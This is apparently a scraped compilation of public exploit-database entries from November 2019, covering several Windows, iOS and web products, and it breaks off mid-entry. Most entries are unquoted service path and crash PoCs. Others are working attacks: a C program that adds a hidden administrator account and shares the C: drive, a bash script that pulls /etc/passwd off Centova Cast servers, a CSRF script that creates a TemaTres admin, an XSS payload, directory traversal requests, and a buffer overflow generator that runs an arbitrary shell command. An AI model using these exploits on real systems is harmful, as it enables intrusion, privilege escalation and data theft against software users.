ISHACK AI BOT

# Exploit Title: Shrew Soft VPN Client 2.2.2 - 'iked' Unquoted Service Path # Date: 2019-11-14 # Exploit Author: D.Goedecke # Vendor Homepage: www.shrew.net # Software Link: https://www.shrew.net/download/vpn/vpn-client-2.2.2-release.exe # Version: 2.2.2 # Tested on: Windows 10 64bit C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ ShrewSoft IKE Daemon iked C:\Program Files\ShrewSoft\VPN Client\iked.exe -service Auto ShrewSoft IPSEC Daemon ipsecd C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe -service Auto C:\Users\user>sc qc iked [SC] QueryServiceConfig SUCCESS SERVICE_NAME: iked TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\ShrewSoft\VPN Client\iked.exe -service LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : ShrewSoft IKE Daemon DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\user>sc qc ipsecd [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ipsecd TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\ShrewSoft\VPN Client\ipsecd.exe -service LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : ShrewSoft IPSEC Daemon DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: ============ A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: iSmartViewPro 1.3.34 - Denial of Service (PoC) # Discovery by: Ivan Marmolejo # Discovery Date: 2019 -11-16 # Vendor Homepage: http://www.smarteyegroup.com/ # Software Link: https://apps.apple.com/mx/app/ismartviewpro/id834791071 # Tested Version: 1.3.34 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: iPhone 6s - iOS 13.2 ############################################################################################################################################## Summary: This app is specially built for P2P IP camera series. thanks to unique P2P connection technology that users are able to watch live video on iPhone from any purchased IP camera by simply enter camera's ID and password; no complex IP or router settings. The app have a lot of functions, such as local record video, set ftp params, set email, set motion alarm and so on. ############################################################################################################################################## Steps to Produce the Crash: 1.- Run python code: iSmartViewPro.py 2.- Copy content to clipboard 3.- Open App "iSmartViewPro" 4.- Go to "Add Camera" 5.- go to "Add network cameras" 6.- Paste ClipBoard on "Camara DID" 7.- Paste ClipBoard on "Password" 8.- Next 9.- Crashed ############################################################################################################################################## Python "iSmartViewPro" Code: buffer = "\x41" * 257 print (buffer) ##############################################################################################################################################

# Exploit Title: Emerson PAC Machine Edition 9.70 Build 8595 - 'FxControlRuntime' Unquoted Service Path # Discovery by: Luis Martinez # Discovery Date: 2019-11-17 # Vendor Homepage: https://www.emerson.com/en-us # Software Link : https://www.opertek.com/descargar-software/?prc=_326 # Tested Version: 9.70 Build 8595 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "FxControlRuntime" |findstr /i /v """ FxControl Runtime FxControlRuntime C:\Program Files (x86)\Emerson\PAC Machine Edition\fxControl\Runtime\NT\FxControl.exe Auto # Service info: C:\>sc qc FxControlRuntime [SC] QueryServiceConfig SUCCESS SERVICE_NAME: FxControlRuntime TYPE : 120 WIN32_SHARE_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Emerson\PAC Machine Edition\fxControl\Runtime\NT\FxControl.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : FxControl Runtime DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Lexmark Services Monitor 2.27.4.0.39 - Directory Traversal # Google Dork: N/A # Date: 2019-11-15 # Exploit Author: Kevin Randall # Vendor Homepage: https://www.lexmark.com/en_us.html # Software Link: https://www.lexmark.com/en_us.html # Version: 2.27.4.0.39 (Latest Version) # Tested on: Windows Server 2012 # CVE : CVE-2019-16758 Vulnerability: Lexmark Services Monitor (Version 2.27.4.0.39) Runs on TCP Port 2070. The latest version is vulnerable to a Directory Traversal and Local File Inclusion vulnerability. Timeline: Discovered on: 9/24/2019 Vendor Notified: 9/24/2019 Vendor Confirmed Receipt of Vulnerability: 9/24/2019 Follow up with Vendor: 9/25/2019 Vendor Sent to Engineers to confirm validity: 9/25/2019 - 9/26/2019 Vendor Confirmed Vulnerability is Valid: 9/26/2019 Vendor Said Software is EOL (End of Life). Users should upgrade/migrate all LSM with LRAM. No fix/patch will be made: 9/27/2019 Vendor Confirmed Signoff to Disclose: 9/27/2019 Final Email Sent: 9/27/2019 Public Disclosure: 11/15/2019 PoC: GET /../../../../../../windows/SysWOW64/PerfStringBackup.ini HTTP/1.1 TE: deflate,gzip;q=0.3 Connection: TE, close Host: 10.200.15.70:2070 User-Agent: Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 HTTP/1.0 200 OK Server: rXpress Content-Length: 848536 . . . .[.P.e.r.f.l.i.b.]. . .B.a.s.e. .I.n.d.e.x.=.1.8.4.7. . .L.a.s.t. .C.o.u.n.t.e.r.=.3.3.3.4.6. . .L.a.s.t. .H.e.l.p.=.3.3.3.4.7. . . . .[.P.E.R.F._...N.E.T. .C.L.R. .D.a.t.a.]. . .F.i.r.s.t. .C.o.u.n.t.e.r.=.5.0.2.8. . .F.i.r.s.t. .H.e.l.p.=.5.0.2.9. . .L.a.s.t. .C.o.u.n.t.e.r.=.5.0.4.0. . .L.a.s.t. .H.e.l.p.=.5.0.4.1. . . . .[.P.E.R.F._...N.E.T. .C.L.R. .N.e.t.w.o.r.k.i.n.g.]. . .F.i.r.s.t. .C.o.u.n.t.e.r.=.4.9.8.6. GET /../../../../../windows/SysWOW64/slmgr/0409/slmgr.ini HTTP/1.1 TE: deflate,gzip;q=0.3 Connection: TE, close Host: 10.200.15.70:2070 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.3 HTTP/1.0 200 OK Server: rXpress Content-Length: 38710 ..[.S.t.r.i.n.g.s.]. . .L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".i.p.k.". . .L._.o.p.t.I.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".I.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y. .(.r.e.p.l.a.c.e.s. .e.x.i.s.t.i.n.g. .k.e.y.).". . .L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.=.".u.p.k.". . .L._.o.p.t.U.n.i.n.s.t.a.l.l.P.r.o.d.u.c.t.K.e.y.U.s.a.g.e.=.".U.n.i.n.s.t.a.l.l. .p.r.o.d.u.c.t. .k.e.y.". . .L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.=.".a.t.o.". . .L._.o.p.t.A.c.t.i.v.a.t.e.P.r.o.d.u.c.t.U.s.a.g.e.=.".A.c.t.i.v.a.t.e. .W.i.n.d.o.w.s.". . .L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.=.".d.l.i.". . .L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.=.".D.i.s.p.l.a.y. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).". . .L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.V.e.r.b.o.s.e.=.".d.l.v.". . .L._.o.p.t.D.i.s.p.l.a.y.I.n.f.o.r.m.a.t.i.o.n.U.s.a.g.e.V.e.r.b.o.s.e.=.".D.i.s.p.l.a.y. .d.e.t.a.i.l.e.d. .l.i.c.e.n.s.e. .i.n.f.o.r.m.a.t.i.o.n. .(.d.e.f.a.u.l.t.:. .c.u.r.r.e.n.t. .l.i.c.e.n.s.e.).". . .L._.o.p.t.E.x.p.i.r.a.t.i.o.n.D.a.t.i.m.e.=.".x.p.r.". GET /../../../../../windows/system32/drivers/etc/services HTTP/1.1 TE: deflate,gzip;q=0.3 Connection: TE, close Host: 10.200.15.70:2070 User-Agent: Opera/9.50 (Macintosh; Intel Mac OS X; U; de) HTTP/1.0 200 OK Server: rXpress Content-Length: 17463 # Copyright (c) 1993-2004 Microsoft Corp. # # This file contains port numbers for well-known services defined by IANA # # Format: # # <service name> <port number>/<protocol> [aliases...] [#<comment>] # echo 7/tcp echo 7/udp discard 9/tcp sink null discard 9/udp sink null systat 11/tcp users #Active users systat 11/udp users #Active users daytime 13/tcp daytime 13/udp qotd 17/tcp quote #Quote of the day qotd 17/udp quote #Quote of the day chargen 19/tcp ttytst source #Character generator chargen 19/udp ttytst source #Character generator ftp-data 20/tcp #FTP, data ftp 21/tcp #FTP. control ssh 22/tcp #SSH Remote Login Protocol telnet 23/tcp smtp 25/tcp mail #Simple Mail Transfer Protocol time 37/tcp timserver

# Exploit Title: Open Proficy HMI-SCADA 5.0.0.25920 - 'Password' Denial of Service (PoC) # Discovery by: Luis Martinez # Discovery Date: 2019-11-16 # Vendor Homepage: https://apps.apple.com/us/app/proficyscada/id525792142 # Software Link: App Store for iOS devices # GE Intelligent Platforms, Inc. # Tested Version: 5.0.0.25920 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: iPhone 7 iOS 13.2 # Steps to Produce the Crash: # 1.- Run python code: Open_Proficy_HMI-SCADA_for_iOS_5.0.0.25920.py # 2.- Copy content to clipboard # 3.- Open "Open Proficy HMI-SCADA for iOS" # 4.- Host List > "+" # 5.- Add Host # 6.- Address Type "IP Address" # 7.- Host IP Address "192.168.1.1" # 8.- User Name "l4m5" # 9.- Paste ClipBoard on "Password" # 10.- Add # 11.- Connect # 12.- Crashed #!/usr/bin/env python buffer = "\x41" * 2500 print (buffer)

# Exploit Title: ASUS HM Com Service 1.00.31 - 'asHMComSvc' Unquoted Service Path # Date: 2019-11-16 # Exploit Author : Olimpia Saucedo # Vendor Homepage: www.asus.com # Version: 1.00.31 # Tested on: Windows 10 Pro x64 (but it should works on all windows version) The application suffers from an unquoted service path issue impacting the service 'ASUS HM Com Service (aaHMSvc.exe)' related to the Asus Motherboard Utilities. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with system privileges. POC: >wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ ASUS HM Com Service asHmComSvc C:\Program Files (x86)\ASUS\AAHM\1.00.31\aaHMSvc.exe Auto >sc qc "asHMComSvc" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: asHMComSvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\ASUS\AAHM\1.00.31\aaHMSvc.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : ASUS HM Com Service DEPENDENCIES : RpcSs SERVICE_START_NAME : LocalSystem

# Title: Crystal Live HTTP Server 6.01 - Directory Traversal # Date of found: 2019-11-17 # Author: Numan Türle # Vendor Homepage: https://www.genivia.com/ # Version : Crystal Quality 6.01.x.x # Software Link : https://www.crystalrs.com/crystal-quality-introduction/ POC --------- GET /../../../../../../../../../../../../windows/win.iniHTTP/1.1 Host: 12.0.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close Response --------- ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1

# Exploit Title: MobileGo 8.5.0 - Insecure File Permissions # Exploit Author: ZwX # Exploit Date: 2019-11-15 # Vendor Homepage : https://www.wondershare.net/ # Software Link: https://www.wondershare.net/mobilego/ # Tested on OS: Windows 7 # Proof of Concept (PoC): ========================== C:\Program Files\Wondershare\MobileGo>icacls *.exe adb.exe Everyone:(I)(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) APKInstaller.exe Everyone:(I)(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) BsSndRpt.exe Everyone:(I)(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) DriverInstall.exe Everyone:(I)(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) fastboot.exe Everyone:(I)(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) FetchDriver.exe Everyone:(I)(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) MGNotification.exe Everyone:(I)(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) MobileGo.exe Everyone:(I)(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) MobileGoService.exe Everyone:(I)(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) unins000.exe Everyone:(I)(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) URLReqService.exe Everyone:(I)(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) WAFSetup.exe Everyone:(I)(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) WsConverter.exe Everyone:(I)(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) WsMediaInfo.exe Everyone:(I)(F) AUTORITE NT\Système:(I)(F) BUILTIN\Administrateurs:(I)(F) BUILTIN\Utilisateurs:(I)(RX) #Exploit code(s): ================= 1) Compile below 'C' code name it as "MobileGo.exe" #include<windows.h> int main(void){ system("net user hacker abc123 /add"); system("net localgroup Administrators hacker /add"); system("net share SHARE_NAME=c:\ /grant:hacker,full"); WinExec("C:\\Program Files\\Wondershare\\MobileGo\\~MobileGo.exe",0); return 0; } 2) Rename original "MobileGo.exe" to "~MobileGo.exe" 3) Place our malicious "MobileGo.exe" in the MobileGo directory 4) Disconnect and wait for a more privileged user to connect and use MobileGo IDE. Privilege Successful Escalation

# Exploit Title: NCP_Secure_Entry_Client 9.2 - Unquoted Service Paths # Date: 2019-11-17 # Exploit Author: Akif Mohamed Ik # Vendor Homepage: http://software.ncp-e.com/ # Software Link: http://software.ncp-e.com/NCP_Secure_Entry_Client/Windows/9.2x/ # Version: 9.2x # Tested on: Windows 7 SP1 # CVE : NA C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """ ncprwsnt ncprwsnt C:\Program Files (x86)\NCP\SecureClient\ncprwsnt.exe Auto rwsrsu rwsrsu C:\Program Files (x86)\NCP\SecureClient\rwsrsu.exe Auto ncpclcfg ncpclcfg C:\Program Files (x86)\NCP\SecureClient\ncpclcfg.exe Auto NcpSec NcpSec C:\Program Files (x86)\NCP\SecureClient\NCPSEC.EXE Auto C:\Users\ADMIN>sc qc ncprwsnt [SC] QueryServiceConfig SUCCESS SERVICE_NAME: ncprwsnt TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\NCP\SecureClient\ncprwsnt.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : ncprwsnt DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\ADMIN>sc qc rwsrsu [SC] QueryServiceConfig SUCCESS SERVICE_NAME : rwsrsu TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\NCP\SecureClient\rwsrsu.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : rwsrsu DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\ADMIN>sc qc ncpclcfg [SC] QueryServiceConfig SUCCESS SERVICE_NAME : ncpclcfg TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\NCP\SecureClient\ncpclcfg.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : ncpclcfg DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\ADMIN>sc qc NcpSec [SC] QueryServiceConfig SUCCESS SERVICE_NAME : NcpSec TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\NCP\SecureClient\NCPSEC.EXE LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : NcpSec DEPENDENCIES : SERVICE_START_NAME : LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.

# Exploit Title: Centova Cast 3.2.11 - Arbitrary File Download # Date: 2019-11-17 # Exploit Author: DroidU # Vendor Homepage: https://centova.com # Affected Version: <=v3.2.11 # Tested on: Debian 9, CentOS 7 #!/bin/bash if [ "$4" = "" ] then echo "Usage: $0 centovacast_url user password ftpaddress" exit fi url=$1 user=$2 pass=$3 ftpaddress=$4 dwn() { curl -s -k "$url/api.php?xm=server.copyfile&f=json&a\[username\]=$user&a\[password\]=$pass&a\[sourcefile\]=$1&a\[destfile\]=1.tmp" wget -q "ftp://$user:$pass@$ftpaddress/1.tmp" -O $2 } dwn /etc/passwd passwd echo " /etc/passwd: " cat passwd

# Exploit Title: TemaTres 3.0 — Cross-Site Request Forgery (Add Admin) # Author: Pablo Santiago # Date: 2019-11-14 # Vendor Homepage: https://www.vocabularyserver.com/ # Source: https://sourceforge.net/projects/tematres/files/TemaTres%203.0/tematres3.0.zip/download # Version: 3.0 # CVE : 2019–14345 # Reference:https://medium.com/@Pablo0xSantiago/cve-2019-14345-ff6f6d9fd30f # Tested on: Windows 10 # Description: # Web application for management formal representations of knowledge, # thesauri, taxonomies and multilingual vocabularies / Aplicación para # la gestión de representaciones formales del conocimiento, tesauros, # taxonomías, vocabularios multilingües. #Exploit import requests import sys session = requests.Session() http_proxy = “http://127.0.0.1:8080" https_proxy = “https://127.0.0.1:8080" proxyDict = { “http” : http_proxy, “https” : https_proxy } url = ‘http://localhost/tematres/vocab/login.php' values = {‘id_correo_electronico’: ‘[email protected]’, ‘id_password’: ‘admin’, ‘task’:’login’} r = session.post(url, data=values, proxies=proxyDict) cookie = session.cookies.get_dict()[‘PHPSESSID’] print (cookie) host = sys.argv[1] user = input(‘[+]User:’) lastname = input(‘[+]lastname:’) password = input(‘[+]Password:’) password2 = input(‘[+]Confirm Password:’) email = input(‘[+]Email:’) if (password == password2): #configure proxy burp data = { ‘_nombre’:user, ‘_apellido’:lastname, ‘_correo_electronico’:email, ‘orga’:’bypassed’, ‘_clave’:password, ‘_confirmar_clave’:password2, ‘isAdmin’:1, ‘boton’:’Guardar’, ‘userTask’:’A’, ‘useactua’:’’ } headers= { ‘Cookie’: ‘PHPSESSID=’+cookie } request = session.post(host+’/tematres/vocab/admin.php’, data=data, headers=headers, proxies=proxyDict) print(‘+ — — — — — — — — — — — — — — — — — — — — — — — — — +’) print(‘Status Code:’+ str(request.status_code)) else: print (‘Passwords dont match!!!’)

# Exploit Title: TemaTres 3.0 - 'value' Persistent Cross-site Scripting # Author: Pablo Santiago # Date: 2019-11-14 # Vendor Homepage: https://www.vocabularyserver.com/ # Source: https://sourceforge.net/projects/tematres/files/TemaTres%203.0/tematres3.0.zip/download # Version: 3.0 # CVE : 2019–14343 # Reference: https://medium.com/@Pablo0xSantiago/cve-2019-14343-ebc120800053 # Tested on: Windows 10 #Description: The parameter "value" its vulnerable to Stored Cross-site scripting.. #Payload: “><script>alert(“XSS”)<%2fscript> POST /tematres3.0/vocab/admin.php?vocabulario_id=list HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://localhost/tematres3.0/vocab/admin.php?vocabulario_id=list Content-Type: application/x-www-form-urlencoded Content-Length: 44 Connection: close Cookie: PHPSESSID=uejtn72aavg5eit9sc9bnr2jse Upgrade-Insecure-Requests: 1 doAdmin=&valueid=&value=12vlpcv%22%3e%3cscript%3ealert(%22XSS%22)%3c%2fscript%3edx6e1&alias=ACX&orden=2

# Exploit Title: Foscam Video Management System 1.1.4.9 - 'Username' Denial of Service (PoC) # Author: chuyreds # Discovery Date: 2019-11-16 # Vendor Homepage: https://www.foscam.es/ # Software Link : https://www.foscam.es/descarga/FoscamVMS_1.1.4.9.zip # Tested Version: 1.1.4.9 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 10 Pro x64 es # Steps to Produce the Crash: # 1.- Run python code : python foscam-vms-uid-dos.py # 2.- Open FoscamVMS1.1.4.9.txt and copy its content to clipboard # 3.- Open FoscamVMS # 4.- Go to Add Device # 5.- Choose device type "NVR"/"IPC" # 6.- Copy the content of the file into Username # 7.- Click on Login Check # 8.- Crashed buffer = "\x41" * 520 f = open ("FoscamVMS_1.1.4.9.txt", "w") f.write(buffer) f.close()

#Exploit Title: BartVPN 1.2.2 - 'BartVPNService' Unquoted Service Path #Exploit Author : ZwX #Exploit Date: 2019-11-18 #Vendor Homepage : https://www.filehorse.com/ #Link Software : https://www.filehorse.com/download-bartvpn/ #Tested on OS: Windows 7 #Analyze PoC : ============== C:\Users\ZwX>sc qc BartVPNService [SC] QueryServiceConfig réussite(s) SERVICE_NAME: BartVPNService TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Users\ZwX\AppData\Local\BartVPN\BartVPNService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : BartVPNService DEPENDENCIES : SERVICE_START_NAME : LocalSystem

# Exploit Title: nipper-ng 0.11.10 - Remote Buffer Overflow (PoC) # Date: 2019-10-20 # Exploit Author: Guy Levin # https://blog.vastart.dev # Vendor Homepage: https://tools.kali.org/reporting-tools/nipper-ng # Software Link: https://code.google.com/archive/p/nipper-ng/source/default/source # Version: 0.11.10 # Tested on: Debian # CVE : CVE-2019-17424 """ Exploit generator created by Guy Levin (@va_start - twitter.com/va_start) Vulnerability found by Guy Levin (@va_start - twitter.com/va_start) For a detailed writeup of CVE-2019-17424 and the exploit building process, read my blog post https://blog.vastart.dev/2019/10/stack-overflow-cve-2019-17424.html may need to run nipper-ng with enviroment variable LD_BIND_NOW=1 on ceratin systems """ import sys import struct def pack_dword(i): return struct.pack("<I", i) def prepare_shell_command(shell_command): return shell_command.replace(" ", "${IFS}") def build_exploit(shell_command): EXPLOIT_SKELETON = r"privilage exec level 1 " \ "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa " \ "aasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaab " \ "kaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaacca " \ "acdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaac " \ "uaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadma " \ "adnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaae " \ "faaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewa " \ "aexaaeyaaezaafbaafcaafdaafeaaffaafgaafhaafiaafjaafkaaflaafmaafnaafoaaf " \ "paafqaafraafsaaftaafuaafvaafwaafxaafyaafzaagbaagcaagdaageaagfaaggaagha " \ "agiaagjaagkaaglaagmaagnaagoaagpaagqaagraagsaagtaaguaagvaagwaagxaagyaag " \ "zaahbaahcaahdaaheaahfaahgaahhaahiaahjaahkaahlaahmaahnaahoaahpaahqaahra " \ "ahaaaataahuaahvaahwaahpaaaaaaazaaibaaicaaidaaieaaifaaigaaihaaiiaaijaai " \ "kaailaaimaainaaioaaipaaiqaairaaisaaitaaiuaaivaaiwaaixaaiyaaizaajbaajca " \ "ajdaajeaajfaajgaajhaajiaajjaajkaajlaajmaajnaajoaajpaajqaajraajsaajtaaj" WRITEABLE_BUFFER = 0x080FA001 CALL_TO_SYSTEM = 0x0804E870 COMMAND_BUFFER = 0x080FA015 OFFSET_FOR_WRITEABLE_BUFFER = 0x326 OFFSET_FOR_RETURN = 0x33a OFFSET_FOR_COMMAND_BUFFER = 0x33e OFFSET_FOR_SHELL_COMMAND = 0x2a MAX_SHELL_COMMAND_CHARS = 48 target_values_at_offsets = { WRITEABLE_BUFFER : OFFSET_FOR_WRITEABLE_BUFFER, CALL_TO_SYSTEM : OFFSET_FOR_RETURN, COMMAND_BUFFER : OFFSET_FOR_COMMAND_BUFFER } exploit = bytearray(EXPLOIT_SKELETON, "ascii") # copy pointers for target_value, target_offset in target_values_at_offsets.items(): target_value = pack_dword(target_value) exploit[target_offset:target_offset+len(target_value)] = target_value # copy payload if len(shell_command) > MAX_SHELL_COMMAND_CHARS: raise ValueError("shell command is too big") shell_command = prepare_shell_command(shell_command) if len(shell_command) > MAX_SHELL_COMMAND_CHARS: raise ValueError("shell command is too big after replacing spaces") # adding padding to end of shell command for i, letter in enumerate(shell_command + "&&"): exploit[OFFSET_FOR_SHELL_COMMAND+i] = ord(letter) return exploit def main(): if len(sys.argv) != 3: print(f"usage: {sys.argv[0]} <shell command to execute> <output file>") return 1 try: payload = build_exploit(sys.argv[1]) except Exception as e: print(f"error building exploit: {e}") return 1 open(sys.argv[2], "wb").write(payload) return 0 # success if __name__ == '__main__': main()

# Exploit Title: ipPulse 1.92 - 'Enter Key' Denial of Service (PoC) # Discovery by: Diego Buztamante # Discovery Date: 2019-11-18 # Vendor Homepage: https://www.netscantools.com/ippulseinfo.html # Software Link : http://download.netscantools.com/ipls192.zip # Tested Version: 1.92 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: Windows 10 Pro x64 es # Steps to Produce the Crash: # 1.- Run python code : python ipPulse_1.92.py # 2.- Open ipPulse_1.92.txt and copy content to clipboard # 3.- Open ippulse.exe # 4.- Click on "Enter Key" # 5.- Paste ClipBoard on "Name: " # 6.- OK # 7.- Crashed #!/usr/bin/env python buffer = "\x41" * 256 f = open ("ipPulse_1.92.txt", "w") f.write(buffer) f.close()

# Exploit Title: scadaApp for iOS 1.1.4.0 - 'Servername' Denial of Service (PoC) # Discovery by: Luis Martinez # Discovery Date: 2019-11-18 # Vendor Homepage: https://apps.apple.com/ca/app/scadaapp/id1206266634 # Software Link: App Store for iOS devices # Tested Version: 1.1.4.0 # Vulnerability Type: Denial of Service (DoS) Local # Tested on OS: iPhone 7 iOS 13.2 # Steps to Produce the Crash: # 1.- Run python code: scadaApp_for_iOS_1.1.4.0.py # 2.- Copy content to clipboard # 3.- Open "scadaApp for iOS" # 4.- Let's go # 5.- Username > "l4m5" # 6.- Password > "l4m5" # 7.- Paste ClipBoard on "Servername" # 8.- Login # 9.- Crashed #!/usr/bin/env python buffer = "\x41" * 257 print (buffer)

# Exploit Title: Studio 5000 Logix Designer 30.01.00 - 'FactoryTalk Activation Service' Unquoted Service Path # Discovery by: Luis Martinez # Discovery Date: 2019-11-18 # Vendor Homepage: https://www.rockwellautomation.com/en_NA/overview.page # Software Link : https://www.rockwellautomation.com/en_NA/products/factorytalk/overview.page?pagetitle=Studio-5000-Logix-Designer&docid=924d2f2060bf9d409286937296a18142 # Rockwell Automation Technologies # Tested Version: 30.01.00 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "Rockwell" |findstr /i /v """ FactoryTalk Activation Service FactoryTalk Activation Service C:\Program Files (x86)\Rockwell Software\FactoryTalk Activation\lmgrd.exe Auto # Service info: C:\>sc qc "FactoryTalk Activation Service" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: FactoryTalk Activation Service 